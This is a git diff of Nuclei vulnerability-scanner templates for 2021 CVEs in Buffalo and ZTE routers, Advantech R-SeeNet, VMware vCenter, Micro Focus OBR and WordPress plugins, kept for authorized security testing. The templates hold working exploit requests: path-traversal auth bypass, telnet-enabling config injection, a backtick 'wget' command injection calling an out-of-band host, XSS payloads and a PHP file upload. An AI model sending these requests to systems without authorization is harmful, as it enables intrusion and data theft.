0000000000..2e2a5ad591 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-20090.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-20090 + +info: + name: Buffalo WSR-2533DHPL2 - Path Traversal + author: gy741 + severity: critical + description: | + Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces. + reference: + - https://www.tenable.com/security/research/tra-2021-13 + - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20090 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-20090 + cwe-id: CWE-22 + tags: cve,cve2021,lfi,buffalo,firmware,iot + +requests: + - raw: + - | + GET /images/..%2finfo.html HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}}/info.html + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'URLToken(cgi_path)' + - 'pppoe' + - 'wan' + condition: and + +# Enhanced by mp on 2022/05/05 diff --git a/nuclei-templates/CVE-2021/cve-2021-20091.yaml b/nuclei-templates/CVE-2021/cve-2021-20091.yaml new file mode 100644 index 0000000000..543362500a --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-20091.yaml @@ -0,0 +1,53 @@ +id: CVE-2021-20091 + +info: + name: Buffalo WSR-2533DHPL2 - Configuration File Injection + author: gy741,pdteam,parth + severity: high + description: | + The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 does not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution. + reference: + - https://www.tenable.com/security/research/tra-2021-13 + - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20091 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2021-20091 + tags: cve,cve2021,buffalo,firmware,iot + +requests: + - raw: + - | + GET /images/..%2finfo.html HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}}/info.html + + - | + POST /images/..%2fapply_abstract.cgi HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}}/info.html + Content-Type: application/x-www-form-urlencoded + + action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4 + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "/Success.htm" + + - type: status + status: + - 302 + + extractors: + - type: regex + name: httoken + internal: true + group: 1 + regex: + - 'base64\,(.*?)" border=' + +# Enhanced by mp on 2022/04/12 diff --git a/nuclei-templates/CVE-2021/cve-2021-20092.yaml b/nuclei-templates/CVE-2021/cve-2021-20092.yaml new file mode 100644 index 0000000000..7a029962c1 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-20092.yaml @@ -0,0 +1,58 @@ +id: CVE-2021-20092 + +info: + name: Buffalo WSR-2533DHPL2 - Improper Access Control + author: gy741,pdteam,parth + severity: high + description: | + The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor. + reference: + - https://www.tenable.com/security/research/tra-2021-13 + - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20091 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-20092 + cwe-id: CWE-200 + tags: cve,cve2021,buffalo,firmware,iot + +requests: + - raw: + - | + GET /images/..%2finfo.html HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}}/info.html + + - | + GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}} HTTP/1.1 + Host: {{Hostname}} + Cookie: lang=8; url=ping.html; mobile=false; + Referer: {{BaseURL}}/info.html + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "application/x-javascript" + - type: word + words: + - "/*DEMO*/" + - "addCfg(" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + name: httoken + internal: true + group: 1 + regex: + - 'base64\,(.*?)" border=' + +# Enhanced by mp on 2022/04/12 diff --git a/nuclei-templates/CVE-2021/cve-2021-20792.yaml b/nuclei-templates/CVE-2021/cve-2021-20792.yaml new file mode 100644 index 0000000000..8430ef6363 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-20792.yaml @@ -0,0 +1,50 @@ +id: CVE-2021-20792 + +info: + name: Quiz And Survey Master < 7.1.14 - Reflected Cross-Site Scripting + author: dhiyaneshDK + severity: medium + description: Cross-site scripting vulnerability in Quiz And Survey Master versions prior to 7.1.14 allows a remote attacker to inject arbitrary script via unspecified vectors." + reference: + - https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf + - https://nvd.nist.gov/vuln/detail/CVE-2021-20792 + - https://quizandsurveymaster.com/ + - https://jvn.jp/en/jp/JVN65388002/index.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-20792 + cwe-id: CWE-79 + tags: wordpress,cve,cve2021,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin.php?page=mlw_quiz_list&s=">&paged="> HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/CVE-2021/cve-2021-21745.yaml b/nuclei-templates/CVE-2021/cve-2021-21745.yaml new file mode 100644 index 0000000000..867df640ad --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-21745.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-21745 + +info: + name: ZTE MF971R - Referer authentication bypass + author: gy741 + severity: medium + description: | + ZTE MF971R product has a Referer authentication bypass vulnerability. Without CSRF verification, an attackercould + use this vulnerability to perform illegal authorization operations by sending a request to the user to click. + reference: + - https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1317 + - https://nvd.nist.gov/vuln/detail/CVE-2021-21745 + - https://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1019764 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2021-21745 + cwe-id: CWE-287 + tags: zte,auth-bypass,cve,cve2021,router + +requests: + - raw: + - | + GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1 + Host: {{Hostname}} + Referer: http://interact.sh/127.0.0.1.html + + matchers-condition: and + matchers: + + - type: regex + part: body + regex: + - 'psw_fail_num_str":"[0-9]' + + - type: status + status: + - 200 +# Enhanced by mp on 2022/05/21 diff --git a/nuclei-templates/CVE-2021/cve-2021-21799.yaml b/nuclei-templates/CVE-2021/cve-2021-21799.yaml new file mode 100644 index 0000000000..3c93d2ef05 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-21799.yaml @@ -0,0 +1,43 @@ +id: CVE-2021-21799 + +info: + name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the telnet_form.php script functionality. + reference: + - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270 + - https://nvd.nist.gov/vuln/detail/CVE-2021-21799 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-21799 + cwe-id: CWE-79 + metadata: + shodan-query: http.html:"R-SeeNet" + verified: "true" + tags: cve,cve2021,xss,r-seenet + +requests: + - method: GET + path: + - "{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Telnet " + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/09/02 diff --git a/nuclei-templates/CVE-2021/cve-2021-21801.yaml b/nuclei-templates/CVE-2021/cve-2021-21801.yaml new file mode 100644 index 0000000000..970f374b80 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-21801.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-21801 + +info: + name: Advantech R-SeeNet graph parameter - Reflected Cross-Site Scripting (XSS) + author: gy741 + severity: medium + description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to + arbitrary JavaScript code execution. + reference: + - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-21801 + cwe-id: CWE-79 + tags: cve,cve2021,rseenet,xss,graph + +requests: + - method: GET + path: + - '{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22' + + matchers-condition: and + matchers: + - type: word + words: + - '"zlo onerror=alert(1) "' + - 'Device Status Graph' + part: body + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-21802.yaml b/nuclei-templates/CVE-2021/cve-2021-21802.yaml new file mode 100644 index 0000000000..df8b1fca2a --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-21802.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-21802 + +info: + name: Advantech R-SeeNet device_id parameter - Reflected Cross-Site Scripting (XSS) + author: gy741 + severity: medium + description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to + arbitrary JavaScript code execution. + reference: + - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-21802 + cwe-id: CWE-79 + tags: cve,cve2021,rseenet,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22' + + matchers-condition: and + matchers: + - type: word + words: + - '"zlo onerror=alert(1) "' + - 'Device Status Graph' + part: body + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-21805.yaml b/nuclei-templates/CVE-2021/cve-2021-21805.yaml deleted file mode 100644 index 7c6b7bea06..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-21805.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2021-21805 - -info: - name: Advantech R-SeeNet 2.4.12 - OS Command Injection - author: arafatansari - severity: critical - description: | - Advantech R-SeeNet 2.4.12 is susceptible to remote OS command execution via the ping.php script functionality. An attacker, via a specially crafted HTTP request, can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. - reference: - - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805 - - https://nvd.nist.gov/vuln/detail/CVE-2021-21805 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-21805 - cwe-id: CWE-78 - metadata: - shodan-query: http.html:"R-SeeNet" - verified: "true" - tags: cve,cve2021,rce,r-seenet - -requests: - - method: GET - path: - - "{{BaseURL}}/php/ping.php?hostname=|dir" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Ping |dir" - - "bottom.php" - condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by md on 2022/10/06 diff --git a/nuclei-templates/CVE-2021/CVE-2021-21816.yaml b/nuclei-templates/CVE-2021/cve-2021-21816.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-21816.yaml rename to nuclei-templates/CVE-2021/cve-2021-21816.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-21973.yaml b/nuclei-templates/CVE-2021/cve-2021-21973.yaml new file mode 100644 index 0000000000..ca41de8384 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-21973.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-21973 + +info: + name: VMware vCenter Unauthenticated SSRF + author: pdteam + severity: medium + description: The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-21973 + - https://twitter.com/osama_hroot/status/1365586206982082560 + - https://twitter.com/bytehx343/status/1486582542807420928 + - https://www.vmware.com/security/advisories/VMSA-2021-0002.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-21973 + cwe-id: CWE-918 + tags: cve,cve2021,vmware,ssrf,vcenter,oast + +requests: + - raw: + - | + GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1 + Host: {{Hostname}} + Vcip: {{interactsh-url}} + Vcpassword: {{rand_base(6)}} + Vcusername: {{rand_base(6)}} + Reqresource: {{rand_base(6)}} + + matchers-condition: and + matchers: + - type: status + status: + - 500 + + - type: word + part: body + words: + - "The server sent HTTP status code 200" \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-21985.yaml b/nuclei-templates/CVE-2021/cve-2021-21985.yaml new file mode 100644 index 0000000000..303389b8c8 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-21985.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-21985 + +info: + name: VMware vSphere Client (HTML5) - Remote Code Execution + author: D0rkerDevil + severity: critical + description: | + The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. + reference: + - https://www.vmware.com/security/advisories/VMSA-2021-0010.html + - https://github.com/alt3kx/CVE-2021-21985_PoC + - https://nvd.nist.gov/vuln/detail/CVE-2021-21985 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-21985 + cwe-id: CWE-20 + tags: cve,cve2021,rce,vsphere,vmware + +requests: + - raw: + - | + POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/json + + {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]} + + matchers: + - type: word + words: + - '{"result":{"isDisconnected":' + part: body + +# Enhanced by mp on 2022/05/05 diff --git a/nuclei-templates/CVE-2021/cve-2021-22502.yaml b/nuclei-templates/CVE-2021/cve-2021-22502.yaml new file mode 100644 index 0000000000..0c1d4eb176 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-22502.yaml @@ -0,0 +1,63 @@ +id: CVE-2021-22502 + +info: + name: Micro Focus Operations Bridge Reporter - Remote Code Execution + author: pikpikcu + severity: critical + description: | + Micro Focus Operations Bridge Reporter 10.40 is susceptible to remote code execution. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. + remediation: | + Apply the latest security patches or updates provided by Micro Focus to mitigate this vulnerability. + reference: + - https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md + - https://softwaresupport.softwaregrp.com/doc/KM03775947 + - https://www.zerodayinitiative.com/advisories/ZDI-21-153/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-22502 + - https://www.zerodayinitiative.com/advisories/ZDI-21-154/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-22502 + cwe-id: CWE-78 + epss-score: 0.96129 + epss-percentile: 0.99354 + cpe: cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: microfocus + product: operation_bridge_reporter + tags: cve,cve2021,microfocus,obr,rce,kev + +http: + - raw: + - | + POST /AdminService/urest/v1/LogonResource HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"userName":"something `wget {{interactsh-url}}`","credential":"whatever"} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" + + - type: word + part: body + words: + - "An error occurred" + - "AUTHENTICATION_FAILED" + condition: and + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 401 +# digest: 4a0a0047304502205c37261d08f99c592bc5b850577bf00a9fad2b18dc5e65be14f5058863cc4090022100dfb6b7791625c23d24f5883edf3cddc8b3b822995b841fa480ceb3147a0796aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-23241.yaml b/nuclei-templates/CVE-2021/cve-2021-23241.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-23241.yaml rename to nuclei-templates/CVE-2021/cve-2021-23241.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-24226.yaml b/nuclei-templates/CVE-2021/cve-2021-24226.yaml new file mode 100644 index 0000000000..80cb8fab90 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-24226.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-24226 + +info: + name: AccessAlly < 3.5.7 - $_SERVER Superglobal Leakage + author: dhiyaneshDK + severity: high + description: In the AccessAlly WordPress plugin before 3.5.7, the file \"resource/frontend/product/product-shortcode.php\" responsible for the [accessally_order_form] shortcode is dumping serialize($_SERVER), which + contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, no login or administrator role is required. + reference: + - https://wpscan.com/vulnerability/8e3e89fd-e380-4108-be23-00e87fbaad16 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24226 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-24226 + cwe-id: CWE-200 + tags: wordpress,cve,cve2021,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - '
' + part: body + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header diff --git a/nuclei-templates/CVE-2021/cve-2021-24284.yaml b/nuclei-templates/CVE-2021/cve-2021-24284.yaml new file mode 100644 index 0000000000..3f6dad51b2 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-24284.yaml @@ -0,0 +1,71 @@ +id: CVE-2021-24284 + +info: + name: WordPress Kaswara Modern VC Addons <=3.0.1 - Arbitrary File Upload + author: lamscun,pussycat0x,pdteam + severity: critical + description: | + WordPress Kaswara Modern VC Addons plugin through 3.0.1 is susceptible to an arbitrary file upload. The plugin allows unauthenticated arbitrary file upload via the uploadFontIcon AJAX action, which can be used to obtain code execution. The supplied zipfile is unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP. + reference: + - https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5 + - https://github.com/advisories/GHSA-wqvg-8q49-hjc7 + - https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/ + - https://www.waltermairena.net/en/2021/04/25/0-day-vulnerability-in-the-plugin-kaswara-modern-vc-addons-plugin-what-can-i-do/ + - https://lifeinhex.com/kaswara-exploit-or-how-much-wordfence-cares-about-user-security/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24284 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24284 + cwe-id: CWE-434 + tags: intrusive,unauth,fileupload,wpscan,cve,wordpress,wp-plugin,rce,cve2021,wp + +variables: + zip_file: "{{to_lower(rand_text_alpha(6))}}" + php_file: "{{to_lower(rand_text_alpha(2))}}.php" + php_cmd: "" + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=------------------------d3be34324392a708 + + --------------------------d3be34324392a708 + Content-Disposition: form-data; name="fonticonzipfile"; filename="{{zip_file}}.zip" + Content-Type: application/octet-stream + + {{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}} + --------------------------d3be34324392a708 + Content-Disposition: form-data; name="fontsetname" + + {{zip_file}} + --------------------------d3be34324392a708 + Content-Disposition: form-data; name="action" + + uploadFontIcon + --------------------------d3be34324392a708-- + + - | + GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - "wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css" + + - type: word + part: body_2 + words: + - "phpinfo()" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/10/06 diff --git a/nuclei-templates/CVE-2021/cve-2021-24288.yaml b/nuclei-templates/CVE-2021/cve-2021-24288.yaml new file mode 100644 index 0000000000..03abba0392 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-24288.yaml @@ -0,0 +1,27 @@ +id: CVE-2021-24288 + +info: + name: AcyMailing < 7.5.0 - Open Redirect + author: 0x_Akoko + severity: medium + description: When using acymailing to subscribe to a newsletter, you make a POST request with various parameters. Turning that to a GET request and adding the parameters as GET parameters, you can successfully + go through with the subscription. + reference: + - https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24288 + cwe-id: CWE-601 + tags: wordpress,cve,cve2021,redirect,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header diff --git a/nuclei-templates/CVE-2021/CVE-2021-24298.yaml b/nuclei-templates/CVE-2021/cve-2021-24298.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-24298.yaml rename to nuclei-templates/CVE-2021/cve-2021-24298.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-24316.yaml b/nuclei-templates/CVE-2021/cve-2021-24316.yaml new file mode 100644 index 0000000000..710e42cee8 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-24316.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-24316 + +info: + name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress + author: 0x_Akoko + severity: medium + description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS. + reference: + - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e + - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt + - https://www.wowthemes.net/themes/mediumish-wordpress/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24316 + cwe-id: CWE-79 + tags: cve,cve2021,mediumish,xss,wordpress + +requests: + - method: GET + path: + - '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E ' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + - "Sorry, no posts matched your criteria." + part: body + condition: and + + - type: word + words: + - "text/html" + part: header diff --git a/nuclei-templates/CVE-2021/CVE-2021-24335.yaml b/nuclei-templates/CVE-2021/cve-2021-24335.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-24335.yaml rename to nuclei-templates/CVE-2021/cve-2021-24335.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-24488.yaml b/nuclei-templates/CVE-2021/cve-2021-24488.yaml new file mode 100644 index 0000000000..6ab0297b25 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-24488.yaml @@ -0,0 +1,47 @@ +id: CVE-2021-24488 + +info: + name: WordPress Post Grid <2.1.8 - Cross-Site Scripting + author: cckuailong + severity: medium + description: WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages, + reference: + - https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a + - https://nvd.nist.gov/vuln/detail/CVE-2021-24488 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24488 + cwe-id: CWE-79 + tags: authenticated,wpscan,cve,cve2021,xss,wp,wordpress,wp-plugin + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(document.domain)// HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'value="\"onmouseover=alert(document.domain)/">' + - 'Post Grid' + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/28 diff --git a/nuclei-templates/CVE-2021/cve-2021-24510.yaml b/nuclei-templates/CVE-2021/cve-2021-24510.yaml new file mode 100644 index 0000000000..37b803ab59 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-24510.yaml @@ -0,0 +1,48 @@ +id: CVE-2021-24510 + +info: + name: MF Gig Calendar <= 1.1 - Reflected Cross-Site Scripting (XSS) + author: dhiyaneshDK + severity: medium + description: The MF Gig Calendar WordPress plugin through 1.1 does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue + reference: + - https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24510 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24510 + cwe-id: CWE-79 + tags: wordpress,cve,cve2021,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id="><" HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/CVE-2021/cve-2021-24926.yaml 